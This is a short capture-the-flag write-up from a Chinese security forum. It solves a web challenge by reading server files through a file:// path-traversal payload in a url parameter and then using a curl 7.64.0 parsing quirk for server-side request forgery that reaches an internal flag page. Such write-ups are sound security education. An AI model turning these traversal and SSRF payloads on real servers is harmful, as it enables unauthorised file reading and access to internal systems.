[原创]第四题飞蛾扑火-CTF对抗-看雪论坛-安全社区|安全招聘|bbs.pediy.com

[原创]第四题飞蛾扑火

2022-5-15 14:27 1160

[原创]第四题飞蛾扑火

Qfrost

活跃值

2022-5-15 14:27

1160

通过访问靶机，HTML源码中可以看到提示phpinfo.php，并且可以看到一个URL请求外部链接的功能点。

对url.php的url参数进行测试，发现可以直接使用file协议进行任意文件读取，这里首先读取一下url.php。/url.php?url=file://localhost/../../../../var/www/html/url.php

从源码中可以直到需要使用靶机ssrf访问http://123.57.254.42/flag.php即可获取flag。

接着访问/phpinfo.php可以得知目前的curl的版本为7.64.0,在这个版本的curl可以使用如下payload进行ssrf
/url.php?url=123.57.254.42://localhost/../flag.php

【看雪培训】《Adroid高级研修班》2022年夏季班招生中！

收藏・0

点赞・0

打赏

分享

最新回复 (0)
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

返回

Qfrost

活跃值

发帖

回帖

RANK

关注

他的文章

KCTF 2022春季赛一触即发 WP

[原创]第四题飞蛾扑火

[原创] KCTF2021秋季赛身在何处 WP

[原创] KCTF2021秋季赛声名远扬 WP

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区